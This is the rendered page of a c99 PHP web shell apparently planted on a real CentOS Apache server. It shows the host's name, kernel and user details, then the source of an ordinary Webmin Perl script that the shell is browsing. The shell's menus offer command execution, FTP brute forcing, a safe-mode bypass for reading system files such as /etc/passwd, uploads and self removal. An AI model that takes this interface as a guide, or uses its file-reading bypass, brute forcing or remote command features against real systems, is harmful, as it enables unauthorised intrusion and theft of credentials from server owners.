!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/usr/libexec/webmin/mon/   drwxr-xr-x
Free 49.58 GB of 127.8 GB (38.8%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     list_periods.cgi (2.09 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
#!/usr/bin/perl
# list_periods.cgi
# Display a list of all defined periods

require './mon-lib.pl';
&ui_print_header(undef, $text{'periods_title'}, "");

$conf = &get_mon_config();
@periods = &find("period", $conf);

print "<form action=save_periods.cgi method=post>\n";
print "<table border width=100%>\n";
print "<tr $tb> <td><b>$text{'periods_period'}</b></td> ",
      "<td><b>$text{'periods_times'}</b></td> </tr>\n";
$i = 0;
foreach $p (@periods, { }) {
    local ($name, $value, $dfrom, $dto, $hfrom, $hto, $known);
    if ($p->{'value'} =~ /^\s*(\S+):\s*wd\s+{(\S+)-(\S+)}\s+hr\s+{(\S+)-(\S+)}\s*$/){
        $name = $1;
        $dfrom = $2; $dto = $3; $hfrom = $4; $hto = $5;
        $known++;
        }
    elsif ($p->{'value'} =~ /^\s*(\S+):\s*wd\s+{(\S+)-(\S+)}\s*$/) {
        $name = $1;
        $dfrom = $2; $dto = $3;
        $known++;
        }
    elsif ($p->{'value'} =~ /^\s*(\S+):\s*hr\s+{(\S+)-(\S+)}\s*$/) {
        $name = $1;
        $hfrom = $2; $hto = $3;
        $known++;
        }
    elsif ($p->{'value'} =~ /^\s*(\S+):\s*(.*)$/) {
        $name = $1;
        $value = $2;
        }
    elsif (!$p->{'value'}) {
        $known++;
        }
    print "<tr $cb>\n";
    print "<td><input name=name_$i size=20 value='$name'></td>\n";
    print "<td>\n";
    if ($known || !$p->{'name'}) {
        # Show friendly period inputs
        printf "<input type=radio name=days_def_$i value=1 %s> %s\n",
            $dfrom ? "" : "checked", $text{'periods_alldays'};
        printf "<input type=radio name=days_def_$i value=0 %s>\n",
            $dfrom ? "checked" : "";
        print &day_input("dfrom_$i", $dfrom)," - ",
              &day_input("dto_$i", $dto);

        print "&nbsp;&nbsp;&nbsp;\n";

        printf "<input type=radio name=hours_def_$i value=1 %s> %s\n",
            $hfrom ? "" : "checked", $text{'periods_allhours'};
        printf "<input type=radio name=hours_def_$i value=0 %s>\n",
            $hfrom ? "checked" : "";
        print "<input name=hfrom_$i size=4 value='$hfrom'> - ",
              "<input name=hto_$i size=4 value='$hto'></td> </tr>\n";
        }
    else {
        # Allow any Time::Period string
        print "<input name=value_$i size=50 value='$value'>\n";
        }
    print "</td> </tr>\n";
    $i++;
    }
print "</table>\n";
print "<input type=submit value='$text{'save'}'></form>\n";

&ui_print_footer("", $text{'index_return'});


:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0174 ]--